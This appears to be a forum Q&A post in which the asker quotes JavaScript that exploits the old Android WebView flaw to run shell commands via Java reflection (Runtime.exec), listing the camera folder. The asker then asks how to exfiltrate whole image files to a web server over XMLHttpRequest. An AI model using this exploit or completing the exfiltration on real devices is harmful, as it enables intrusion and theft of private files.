# Handle the output of 'cat example.png' in JS

Tags: javascript, encoding, base64, inputstream

I am trying, out of interest, to do some remote code execution on my old Android phone. On old versions of the Android "WebView" component, there is a vulnerability that makes it possible to execute shell code and read the response via JS. The relevant code, taken from [here](http://50.56.33.56/blog/?p=314), looks like this:

```
function execute(cmdArgs)
{
    return SmokeyBear.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}   

function getContents(inputStream)
{
    var contents = "";
    var b = inputStream.read();
    while(b != -1) {
        var bString = String.fromCharCode(b);
        contents += bString;
        b = inputStream.read();
    }
    return contents;
}

[...]

var p = execute(["ls","/mnt/sdcard/DCIM/Camera/"]);
input = getContents(p.getInputStream());
```

In this example, we list the files in the Camera folder and store them into 'input' as a string, which worked fine for me.

I have read however that the same vulnerability could be used to exfiltrate whole media files. The problem is that I do not know what type of data I get if I just remote-execute 'cat /path/to/example.png' on the phone. I want to submit the data to my (Python) web server. I tried running the above code, converting the bytes to a string (which contains a lot of gibberish), send the string via an XMLHttpRequest, then on my server just save that string to a binary file. That didn't work, obviously. I strongly suspect I should base64 encode the whole thing before transmission, but I don't even know how to retrieve the raw byte array from `p.getInputStream()` . It doesn't help that google doesn't give me any meaningful results for 'javascript inputstream' at all ...

Comment: @leo.fcx I think that's the wrong link...

Comment: @leo.fcx : Did you just paste the wrong link, maybe? I appreciate every bit of help.

Comment: Just wanted to say I just worked this out. Have to go to sleep now though, I'll give a solution tomorrow. I guess I should best just edit the question for that?

Comment: No, you should actually post your own answer and accept it. You won't gain reputation, but this marks the question as solved.